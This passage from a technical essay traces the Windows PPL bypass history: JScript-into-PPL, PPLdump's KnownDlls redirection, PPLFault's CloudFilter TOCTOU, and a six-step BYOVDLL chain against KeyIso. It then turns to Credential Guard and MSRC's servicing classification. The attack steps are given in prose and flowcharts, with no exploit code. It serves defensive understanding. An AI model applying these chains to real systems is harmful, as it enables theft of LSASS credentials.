&lt;td&gt;PROCESS_QUERY_LIMITED_INFORMATION&lt;/td&gt;
&lt;td&gt;Limited mask&lt;/td&gt;
&lt;td&gt;Allowed (DACL permitting)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/Antimalware (3)&lt;/td&gt;
&lt;td&gt;PPL/Lsa (4)&lt;/td&gt;
&lt;td&gt;PROCESS_VM_READ&lt;/td&gt;
&lt;td&gt;3 &amp;lt; 4&lt;/td&gt;
&lt;td&gt;Denied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PPL/WinTcb (6)&lt;/td&gt;
&lt;td&gt;PPL/Lsa (4)&lt;/td&gt;
&lt;td&gt;PROCESS_VM_READ&lt;/td&gt;
&lt;td&gt;6 &amp;gt;= 4&lt;/td&gt;
&lt;td&gt;Allowed&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Audit bit revisits the table from a different angle. The bit is annotated &lt;code&gt;Reserved&lt;/code&gt; in itm4n&apos;s public structure definition and named without semantic gloss in Ionescu Part 1; the precise runtime emission shape on an &lt;code&gt;OpenProcess&lt;/code&gt; denial is not enumerated in any of Ionescu Part 1, Forshaw 2018, itm4n&apos;s RunAsPPL writeup, or Microsoft Learn&apos;s RunAsPPL page (whose CodeIntegrity events 3033/3063/3065/3066 are scoped to &lt;code&gt;AuditLevel&lt;/code&gt; under &lt;code&gt;IFEO\LSASS.exe&lt;/code&gt; and to DLL-load failures, not per-process Audit-bit denials) [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field name and bit position imply a forensic side-channel; the exact event shape is not in the public record.Two adjacent kernel mechanisms exist in the same neighbourhood but mediate different threat models. &lt;code&gt;PROCESS_TRUST_LABEL_ACE&lt;/code&gt; (a Trust SID ACL entry, introduced in Windows 8.1 alongside PPL) is an ACL-side companion that runs &lt;em&gt;inside&lt;/em&gt; &lt;code&gt;SeAccessCheck&lt;/code&gt; -- it adds a token-style trust label that interacts with the security descriptor in the standard way. Code Integrity Guard (&lt;code&gt;ProcessSignaturePolicy&lt;/code&gt;) is a per-process &lt;em&gt;signed-image&lt;/em&gt; enforcer settable at &lt;code&gt;CreateProcess&lt;/code&gt; time via the &lt;code&gt;PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY&lt;/code&gt; attribute. Neither is part of PPL; both interact with the same problem space.&lt;/p&gt;
&lt;p&gt;The kernel verifies who is asking, what they are asking for, and at what rung the target sits. What the kernel &lt;em&gt;cannot&lt;/em&gt; verify is the behaviour of code that arrives through a signed channel and then executes against attacker-controlled data. That structural seam is the entire premise of the bypass arms race, and it is the next section.&lt;/p&gt;
&lt;h2&gt;8. The Bypass Arms Race -- Forshaw, itm4n, Landau&lt;/h2&gt;
&lt;p&gt;If the kernel only verifies the channel by which code enters a PPL, every bypass should attack the seam between channel and behaviour. Test that prediction against the public record. Since 2018, four named bypass acts have hit major Microsoft research blogs. All four sit in the same structural class.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The kernel verifies the channel. It does not verify the behaviour. Every public PPL bypass since 2018 attacks the seam between what the channel proves (a signature, an EKU, a section identity) and what the code does once mapped.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Act I (2018) -- Forshaw and JScript-into-PPL&lt;/h3&gt;
&lt;p&gt;James Forshaw, then at Google Project Zero, published &quot;Injecting Code into Windows Protected Processes Using COM&quot; in October 2018 [@forshaw-2018-10]. The mechanism: a PPL can be made to instantiate a COM object whose CLSID resolves to &lt;code&gt;scrobj.dll&lt;/code&gt;, the Microsoft-signed Windows Script Component scripting host. Once loaded into the PPL, the script object accepts attacker-supplied source code and executes it inside the protected process. The DLL is signed. The kernel admits it. The kernel cannot reason about the JScript source it then runs.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s fix in Windows 10 1803 (April 2018, deployed broadly through that year) was a hardcoded deny-list in &lt;code&gt;CI.DLL&lt;/code&gt;. Forshaw&apos;s own writeup gives the source verbatim [@forshaw-2018-10]:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;UNICODE_STRING g_BlockedDllsForPPL[] = {
    DECLARE_USTR(&quot;scrobj.dll&quot;),
    DECLARE_USTR(&quot;scrrun.dll&quot;),
    DECLARE_USTR(&quot;jscript.dll&quot;),
    DECLARE_USTR(&quot;jscript9.dll&quot;),
    DECLARE_USTR(&quot;vbscript.dll&quot;)
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(
    PEPROCESS Process, LPBYTE Image, SIZE_T ImageSize)
{
    if (!PsIsProtectedProcess(Process)) return STATUS_SUCCESS;
    // walk g_BlockedDllsForPPL; if any match, return STATUS_DYNAMIC_CODE_BLOCKED
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Five DLLs, hardcoded. Microsoft Learn corroborates the policy on the user-facing side [@learn-am-services]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The following scripting DLLs are forbidden by CodeIntegrity inside a protected process: scrobj.dll, scrrun.dll, jscript.dll, jscript9.dll, and vbscript.dll.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Channel: a Microsoft-signed DLL. Behaviour: arbitrary attacker script. The fix narrows the channel by name-listing the five DLLs known to admit attacker behaviour. The class survives.The mechanism was previewed at Recon Montreal 2018 in the joint Forshaw-Ionescu talk &quot;Unknown Known DLLs and other Code Integrity Trust Violations&quot; (June 15-17, 2018) [@recon-mtl-2018]. Forshaw&apos;s August 2017 &quot;Bypassing VirtualBox Process Hardening&quot; essay [@forshaw-2017-vbox] is the structural precursor -- it makes the same channel-vs-behaviour argument against a different kernel-supported process-hardening regime.&lt;/p&gt;
&lt;h3&gt;Act II (2018-2021) -- DefineDosDevice and PPLdump&lt;/h3&gt;
&lt;p&gt;In his August 2018 post on object-directory exploits [@forshaw-2018-08], Forshaw added a single throwaway sentence that the security community would spend three years productising. itm4n quotes it verbatim in his 2021 SCRT walkthrough [@itm4n-scrt]:&lt;/p&gt;

Abusing the DefineDosDevice API actually has a second use, it&apos;s an Administrator to Protected Process Light (PPL) bypass.
&lt;p&gt;The mechanism, fully worked out by itm4n in April 2021, is structural and uses that same primitive. As an administrator, call &lt;code&gt;DefineDosDevice&lt;/code&gt; to create a symbolic link in &lt;code&gt;\KnownDlls\&lt;/code&gt; (the object-directory subkey that the loader uses for fast known-DLL lookups). The call is dispatched via RPC to &lt;code&gt;csrss.exe&lt;/code&gt;, which runs at PPL/WinTcb (rung 6) and so has the lattice authority to write into protected directories. The administrator gets a &lt;code&gt;\KnownDlls\&lt;/code&gt; entry pointing at an attacker-controlled section. Now start a PPL. The PPL&apos;s loader resolves DLL names through &lt;code&gt;\KnownDlls\&lt;/code&gt; and finds the administrator&apos;s entry. The PPL maps the attacker&apos;s section without re-validating its on-disk signature, because &lt;code&gt;\KnownDlls\&lt;/code&gt; is the kernel&apos;s vouched-for fast path.&lt;/p&gt;
&lt;p&gt;itm4n&apos;s PPLdump tool, published April 2021, automated the attack. The README test matrix lists every Windows version it ran against [@ppldump-repo]. For fifteen months, an administrator could dump any PPL&apos;s memory, including &lt;code&gt;lsass.exe&lt;/code&gt;, despite &lt;code&gt;RunAsPPL&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s fix arrived in build 19044.1826 (the July 2022 update to Windows 10 21H2). itm4n&apos;s &quot;End of PPLdump&quot; writeup describes the patch and the BinDiff diff verbatim [@itm4n-end-of-ppldump]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The conclusion is that PPLs now appear to be behaving just like PPs and therefore no longer rely on Known DLLs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fix patched &lt;code&gt;LdrpInitializeProcess&lt;/code&gt; in NTDLL to skip &lt;code&gt;\KnownDlls\&lt;/code&gt; for PPL processes, behind a Velocity feature flag (&lt;code&gt;Feature_Servicing_2206c_38427506__private_IsEnabled&lt;/code&gt;). PPLdump&apos;s repository README now opens with [@ppldump-repo]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;2022-07-24 - As of Windows 10 21H2 10.0.19044.1826 (July 2022 update), the exploit implemented in PPLdump no longer works. A patch in NTDLL now prevents PPLs from loading Known DLLs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;itm4n&apos;s structural finding -- that *PPLs honoured &lt;code&gt;\KnownDlls\&lt;/code&gt; while PPs did not* -- is the most interesting failure in the 2015–2024 run, because the asymmetry sat in plain sight from 2013 to 2022 and nobody had asked &quot;why are PPs and PPLs loading sections differently?&quot; The fix closes one asymmetry. The structural class survives.PPLdump&apos;s substitution chain uses NTFS transactions and Forrest Orr&apos;s &quot;phantom DLL hollowing&quot; technique to materialise the attacker-controlled section on disk in a way the kernel section creator will accept [@forrest-orr-hollow]. Orr&apos;s writeup is the original publication of the hollowing primitive; PPLdump composes it with the &lt;code&gt;\KnownDlls\&lt;/code&gt; redirection trick.&lt;/p&gt;
&lt;h3&gt;Act III (2022-2024) -- Landau&apos;s PPLFault CI TOCTOU&lt;/h3&gt;
&lt;p&gt;Gabriel Landau, then at Elastic, presented &quot;PPLdump Is Dead. Long Live PPLdump!&quot; at Black Hat Asia 2023 [@bh-asia-2023-pdf]. The mechanism is a Time-Of-Check / Time-Of-Use bug at the section-creation layer.&lt;/p&gt;

A class of bug in which a security property is verified at one point in time but the underlying object is mutable between the check and the use. The protected resource passes its check, then changes between check and access, and the operation proceeds against the changed state without re-verification.
&lt;p&gt;The TOCTOU here is subtle. When a PPL calls &lt;code&gt;NtCreateSection&lt;/code&gt; on a Microsoft-signed DLL, the kernel&apos;s memory manager calls &lt;code&gt;MiValidateSectionCreate&lt;/code&gt;, which calls into &lt;code&gt;ci.dll&lt;/code&gt; to verify the file&apos;s Authenticode signature. The check succeeds. The section is created. But the memory manager does not page in the file contents at section-create time; it pages them in lazily, on demand, when threads first touch the mapped pages. If an attacker can keep the section&apos;s backing file &lt;em&gt;unsubstituted&lt;/em&gt; during the signature check and substituted during the lazy page-in, the kernel will execute attacker bytes through a section whose signature it already verified.&lt;/p&gt;
&lt;p&gt;Landau&apos;s exploit uses Windows&apos; CloudFilter API. An attacker holds an exclusive oplock on a Microsoft-signed DLL during the section-create signature check. After the check passes, the attacker&apos;s CloudFilter &lt;code&gt;FetchDataCallback&lt;/code&gt; provides different bytes (the payload) when the kernel pages in the section. The PPL maps and executes the payload. Landau&apos;s Elastic post documents the chain verbatim [@elastic-pplfault]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The internal memory manager function &lt;code&gt;MiValidateSectionCreate&lt;/code&gt; relies on the Code Integrity module &lt;code&gt;ci.dll&lt;/code&gt; to handle the requisite cryptography and PKI policy.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s fix shipped in Windows Insider Canary build 25941 on September 1, 2023 [@elastic-pplfault]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941 ... Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fix narrows the immediate channel by extending page-hash validation to PPL-loaded images that reside on &lt;em&gt;remote&lt;/em&gt; (SMB redirector) paths -- the precise surface that PPLFault required to drive its CloudFilter &lt;code&gt;FetchDataCallback&lt;/code&gt; substitution [@elastic-pplfault]. Locally-cached PPL DLL loads continue to rely on the section-create signature check, so the structural seam survives. The GA patch shipped on February 13, 2024 [@pplfault-repo]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Channel: a signed Microsoft DLL whose hash matched at section create. Behaviour: attacker payload mapped via the lazy page-in. The fix narrows the channel by widening the verification surface from &quot;the file at section-create time&quot; to &quot;every page at fault time.&quot; The class survives.&lt;/p&gt;
&lt;h3&gt;Act IV (2022-2024) -- BYOVDLL and itm4n&apos;s KeyIso chain&lt;/h3&gt;
&lt;p&gt;Bring Your Own Vulnerable DLL. Coined by Gabriel Landau on Twitter in October 2022 (itm4n screenshots the original tweet [@itm4n-ghost-part1]; tweet status 1580067594568364032). Productised by itm4n in August 2024 in &quot;Ghost in the PPL Part 1.&quot;&lt;/p&gt;

A bypass class against any signature-gated security mechanism in which the attacker loads a *legitimately signed but historically vulnerable* binary and exploits the known vulnerability inside it. The signature check passes; the vulnerability does the work. The structural property that makes the class hard to fix is that the kernel cannot deny-list legitimately signed older Microsoft DLLs without breaking the deployments that still depend on them.
&lt;p&gt;itm4n&apos;s specific chain targets the CNG Key Isolation service (&quot;KeyIso&quot;), which runs in &lt;code&gt;lsass.exe&lt;/code&gt; and so inherits its PPL/Lsa protection. The chain is precise [@itm4n-ghost-part1]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;As administrator, stop the KeyIso service.&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\KeyIso\Parameters\ServiceDll&lt;/code&gt; to point at an older &lt;code&gt;keyiso.dll&lt;/code&gt; extracted from Microsoft update KB5023778. This DLL is Microsoft-signed; the kernel admits it.&lt;/li&gt;
&lt;li&gt;Restart the KeyIso service. The older &lt;code&gt;keyiso.dll&lt;/code&gt; loads into LSASS at PPL/Lsa.&lt;/li&gt;
&lt;li&gt;Trigger CVE-2023-36906, an out-of-bounds read information disclosure in the older &lt;code&gt;keyiso.dll&lt;/code&gt;, to leak an address.&lt;/li&gt;
&lt;li&gt;Trigger CVE-2023-28229, one of six use-after-frees in the same DLL, to obtain control of a &lt;code&gt;CALL&lt;/code&gt; target via the &lt;code&gt;RAX&lt;/code&gt; register.&lt;/li&gt;
&lt;li&gt;Execute attacker code at PPL/Lsa.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The CVEs are real and tracked. k0shl&apos;s writeup is the primary root-cause analysis [@k0shl-keyiso]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;NVD records both [@nvd-2023-28229] [@nvd-2023-36906]. Y3A&apos;s GitHub repository [@y3a-cve-poc] provides a public PoC for CVE-2023-28229 that itm4n&apos;s chain composes.&lt;/p&gt;
&lt;p&gt;Channel: an actually-Microsoft-signed DLL. Behaviour: the memory-safety vulnerability inside it. There is no general fix announced. Microsoft fixed the specific CVEs by shipping a newer &lt;code&gt;keyiso.dll&lt;/code&gt;, but the older DLL remains in circulation (it ships inside every patched cumulative update bundle), and a kernel that has to admit every legitimately signed older Microsoft DLL has no general defense against the next CVE-of-the-month.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; BYOVDLL has no general patch. Microsoft fixes each underlying CVE on the standard cumulative-update cadence. The class persists for as long as the kernel admits older signed Microsoft DLLs into PPLs, which is for as long as legitimately deployed software depends on the older DLLs.&lt;/p&gt;
&lt;/blockquote&gt;

timeline
    title PPL Bypass Arms Race (2018-2024)
    2018-10 : Forshaw JScript-into-PPL : Fix 1803 Apr 2018 : g_BlockedDllsForPPL deny-list
    2021-04 : itm4n PPLdump (KnownDlls) : Fix Jul 2022 build 19044.1826 : LdrpInitializeProcess patch
    2022-09 : Landau PPLFault (TOCTOU) : Fix Feb 2024 13 GA : CI page-hash for PPLs
    2024-08 : itm4n BYOVDLL KeyIso chain : No general fix : CVEs patched piecewise
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Act&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Channel verified&lt;/th&gt;
&lt;th&gt;Behaviour exploited&lt;/th&gt;
&lt;th&gt;Microsoft fix&lt;/th&gt;
&lt;th&gt;Fix date&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;I&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;Microsoft-signed &lt;code&gt;scrobj.dll&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;JScript source executed by COM object&lt;/td&gt;
&lt;td&gt;&lt;code&gt;g_BlockedDllsForPPL&lt;/code&gt; deny-list of 5 DLLs&lt;/td&gt;
&lt;td&gt;Apr 2018 (1803)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;II&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\KnownDlls\&lt;/code&gt; symlink (CSRSS-blessed)&lt;/td&gt;
&lt;td&gt;Attacker section mapped without re-validation&lt;/td&gt;
&lt;td&gt;NTDLL &lt;code&gt;LdrpInitializeProcess&lt;/code&gt; patch&lt;/td&gt;
&lt;td&gt;Jul 2022 (19044.1826)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;III&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;Signed DLL passed &lt;code&gt;MiValidateSectionCreate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;CloudFilter substitutes bytes on lazy page-in&lt;/td&gt;
&lt;td&gt;Page-hash validation for remote-backed PPL image loads&lt;/td&gt;
&lt;td&gt;Feb 2024 (GA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IV&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;Legitimately-signed older &lt;code&gt;keyiso.dll&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Use-after-free + OOB read (CVE-2023-28229, CVE-2023-36906)&lt;/td&gt;
&lt;td&gt;None (CVE-by-CVE)&lt;/td&gt;
&lt;td&gt;open&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TD
    A[Admin stops KeyIso service]
    B[Repoint ServiceDll to older keyiso.dll&lt;br /&gt;from KB5023778]
    C[Restart KeyIso service]
    D[Older keyiso.dll loads&lt;br /&gt;into lsass.exe PPL/Lsa]
    E[Trigger CVE-2023-36906&lt;br /&gt;OOB read for info leak]
    F[Trigger CVE-2023-28229&lt;br /&gt;UAF for RAX control]
    G[Code execution at PPL/Lsa]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F --&amp;gt; G

itm4n explicitly attributes the BYOVDLL framing to Landau&apos;s October 2022 tweet, even though itm4n&apos;s KeyIso chain is the first public productisation. The attribution chain matters because it documents how a one-line research observation (Twitter status 1580067594568364032, screenshot preserved in [@itm4n-ghost-part1]) became a working exploit two years later. The pattern repeats in this domain: Forshaw&apos;s one-sentence DefineDosDevice comment to PPLdump (3 years); Landau&apos;s BYOVDLL tweet to itm4n&apos;s KeyIso chain (2 years). The structural class outlives its discoverer.
&lt;p&gt;Four acts, one class. Every public bypass since 2018 has lived in the same narrow shape: code that becomes part of a PPL through a signed channel and executes attacker-influenced data once mapped. Each generation of fix narrows what the channel admits -- name-list five DLLs; ignore &lt;code&gt;\KnownDlls\&lt;/code&gt;; page-hash every section; CVE-patch every vulnerable older DLL. The class survives because the kernel cannot reason about behaviour. By Rice&apos;s theorem it cannot reason about behaviour in general; in practice, it has nowhere even to start.&lt;/p&gt;
&lt;p&gt;If &lt;code&gt;lsass.exe&lt;/code&gt; code execution is reachable through BYOVDLL, where are the actual &lt;em&gt;secrets&lt;/em&gt;? Not in &lt;code&gt;lsass.exe&lt;/code&gt;. Not anywhere the kernel can read at all. The next section is the companion boundary.&lt;/p&gt;
&lt;h2&gt;9. The Companion Boundary -- Credential Guard, VBS, and &lt;code&gt;LsaIso.exe&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;itm4n opens his RunAsPPL walkthrough with a warning [@itm4n-runasppl]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I noticed that this protection tends to be confused with Credential Guard, which is completely different.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The confusion is understandable. Both run on Windows. Both protect LSASS. Both are configured by domain administrators. Both yield &quot;ACCESS_DENIED&quot; to Mimikatz when working correctly. They are nonetheless answering different questions, and they stack rather than replace each other.&lt;/p&gt;
&lt;p&gt;PPL stops an &lt;em&gt;administrator&lt;/em&gt; from reading kernel-trusted user-mode memory. It does nothing against a kernel-mode attacker who can simply zero the &lt;code&gt;Protection&lt;/code&gt; byte in the target &lt;code&gt;EPROCESS&lt;/code&gt;. The kernel-mode attacker is the next threat-model rung up, and the kernel-mode attacker is the threat that Credential Guard answers, by moving the credentials themselves out of &lt;code&gt;lsass.exe&lt;/code&gt; entirely.&lt;/p&gt;

A Hyper-V-based isolation regime in which the Windows hypervisor partitions the system into Virtual Trust Levels (VTLs). VTL0 contains the normal Windows kernel and user-mode processes. VTL1 contains the Secure Kernel and a small set of user-mode trustlets. Memory in VTL1 is inaccessible to VTL0, even from VTL0 kernel-mode code.

A user-mode process running inside VTL1. Trustlets are Microsoft-signed at a specific protected-process equivalent rung within VTL1 and serve as the user-mode hosts for VBS-isolated functionality. `LsaIso.exe` is the trustlet that holds the actual credential material on Credential Guard-enabled hosts.
&lt;p&gt;The architecture is, at the highest level, three layers: VTL0 user-mode, VTL0 kernel, and VTL1 (Secure Kernel plus trustlets). On a Credential Guard-enabled host, &lt;code&gt;lsass.exe&lt;/code&gt; still exists in VTL0 user-mode, still protects itself with PPL/Lsa, and still answers authentication requests. But it no longer holds the NTLM hashes, Kerberos TGT keys, or Cred Manager domain credentials. Those secrets live in &lt;code&gt;LsaIso.exe&lt;/code&gt;, a trustlet in VTL1. When LSASS needs to authenticate a credential, it makes a hypercall into VTL1, and &lt;code&gt;LsaIso.exe&lt;/code&gt; performs the cryptographic operation entirely within VTL1 memory, returning only the result. The keys never leave VTL1.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s documentation states the threat model directly [@learn-cg]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.&lt;/p&gt;
&lt;p&gt;Credential Guard uses Virtualization-based security (VBS) to isolate secrets so that only privileged system software can access them.&lt;/p&gt;
&lt;p&gt;Malware running in the operating system with administrative privileges can&apos;t extract secrets that are protected by VBS.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The third sentence is the load-bearing one. &lt;em&gt;Malware running with administrative privileges&lt;/em&gt; maps cleanly to a PPL bypass that achieves code execution at PPL/Lsa. Even from inside &lt;code&gt;lsass.exe&lt;/code&gt;, the secrets are not there.&lt;/p&gt;

flowchart TD
    subgraph VTL0[VTL0 normal world]
        Admin[Admin / SYSTEM token]
        Lsass[lsass.exe at PPL/Lsa]
        Kern0[VTL0 kernel]
    end
    subgraph VTL1[VTL1 secure world]
        SK[Secure Kernel]
        Iso[LsaIso.exe trustlet]
        Secrets[NTLM hashes, Kerberos TGT keys]
    end
    Admin -- &quot;PPL barrier (lattice)&quot; --x Lsass
    Lsass -- hypercall --&amp;gt; Iso
    Kern0 -- &quot;VBS barrier (VTL boundary)&quot; --x Iso
    Iso --&amp;gt; Secrets
&lt;p&gt;The two mechanisms stack rather than overlap. PPL prevents an admin from &lt;code&gt;OpenProcess(PROCESS_VM_READ, lsass)&lt;/code&gt; at the user-mode lattice level. Credential Guard prevents a kernel-mode attacker who &lt;em&gt;succeeds&lt;/em&gt; against PPL from finding the keys, because the keys are in VTL1 memory that the VTL0 kernel cannot read at all. itm4n&apos;s &quot;complementary&quot; framing in the RunAsPPL writeup is the right operational summary [@itm4n-runasppl]: deploy both, always both.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PPL gates user-mode admins out of LSASS code memory. Credential Guard gates everything else (kernel-mode attackers, BYOVDLL execution-at-PPL/Lsa) out of the secrets themselves by moving the secrets to VTL1. Each mechanism answers a layer of the threat model the other does not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;PPL (LSA protection)&lt;/th&gt;
&lt;th&gt;Credential Guard&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Threat model&lt;/td&gt;
&lt;td&gt;Administrator -&amp;gt; user-mode LSASS&lt;/td&gt;
&lt;td&gt;VTL0 kernel + admin -&amp;gt; credential material&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Layer&lt;/td&gt;
&lt;td&gt;VTL0 user-mode lattice&lt;/td&gt;
&lt;td&gt;VTL0 / VTL1 VBS boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel-mode attacker&lt;/td&gt;
&lt;td&gt;Cannot stop them&lt;/td&gt;
&lt;td&gt;Stops them (VBS-isolated memory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSRC classification&lt;/td&gt;
&lt;td&gt;Defense in depth&lt;/td&gt;
&lt;td&gt;Security boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default-on (consumer)&lt;/td&gt;
&lt;td&gt;Audit mode, Win11 22H2&lt;/td&gt;
&lt;td&gt;n/a (enterprise)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default-on (enterprise)&lt;/td&gt;
&lt;td&gt;Audit mode, Win11 22H2&lt;/td&gt;
&lt;td&gt;Enabled, Win11 22H2 / Win Server 2025 (domain-joined non-DC)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The architecture of `LsaIso.exe`, its trustlet ID, its IUM EKU, and the hypercall plumbing between LSASS and the trustlet are the subject of a separate article in this series (&quot;VBS Trustlets: What Actually Runs in the Secure Kernel&quot;). The cross-link is deliberate: PPL and Credential Guard are paired in practice, but the architectural depth of VTL1 is its own subject.
&lt;p&gt;Credential Guard&apos;s default-on rollout, recorded in Microsoft Learn [@learn-cg]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Starting in Windows 11, 22H2 and Windows Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two stacked mechanisms; one classified as a security boundary, one not. The next section asks what the classification means.&lt;/p&gt;
&lt;h2&gt;10. Where PPL Isn&apos;t a Security Boundary -- Microsoft&apos;s Servicing Criteria&lt;/h2&gt;
&lt;p&gt;Gabriel Landau&apos;s &quot;Inside Microsoft&apos;s Plan to Kill PPLFault&quot; essay states the classification in one sentence [@elastic-pplfault]:&lt;/p&gt;

Microsoft does not consider PPL to be a security boundary, meaning they won&apos;t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.
&lt;p&gt;Microsoft&apos;s &quot;Windows Security Servicing Criteria&quot; defines the term &lt;em&gt;security boundary&lt;/em&gt; directly [@msrc-servicing]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic [...] security boundary.&lt;/p&gt;
&lt;/blockquote&gt;

A logical separation between code and data of security domains with different levels of trust. Microsoft commits to servicing security boundary violations with out-of-band patches when the severity bar is met. The kernel-mode / user-mode separation is the canonical example. Per Microsoft&apos;s published servicing criteria, PPL is *not* on the security-boundary list.

A security feature that raises the cost of an attack without guaranteeing prevention. Microsoft treats defense-in-depth features as servicing targets on the standard cumulative-update cadence, not as out-of-band patch priorities. PPL falls into this category per Microsoft&apos;s published classification.
&lt;p&gt;The relevant excerpts of the criteria page enumerate which surfaces are and are not boundaries. The live MSRC page renders that enumeration table client-side via JavaScript; the raw HTML returned by automated fetchers contains only the React shell. The text of the enumeration is preserved in the Wayback Machine capture at archive date 2023-05-06 [@msrc-criteria-archive], and Landau&apos;s follow-on Elastic post quotes the relevant administrative-process row verbatim [@elastic-byovd-admin]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong[ly] isolated from the kernel boundary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The corresponding row for PPL is the same shape: administrative-process-to-PPL is not isolated as a security boundary. Landau filed VULN-074311 with MSRC in September 2022 disclosing both an admin-to-PPL and a PPL-to-kernel zero-day. The Elastic post records MSRC&apos;s classification of the disclosure verbatim [@elastic-byovd-admin]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;MSRC similarly does not consider admin-to-PPL a security boundary, instead classifying it as a defense-in-depth security feature.&lt;/p&gt;
&lt;/blockquote&gt;

The MSRC servicing-criteria page&apos;s *definition* of &quot;security boundary&quot; is retrievable from raw HTML and verified against the live page. The *enumeration* of which Windows surfaces are or are not boundaries lives in a client-side rendered table and is not present in the raw HTML payload. The verifiable trail for &quot;PPL is excluded from the boundary list&quot; is the Wayback Machine capture combined with Elastic&apos;s verbatim quotation of MSRC&apos;s classification.
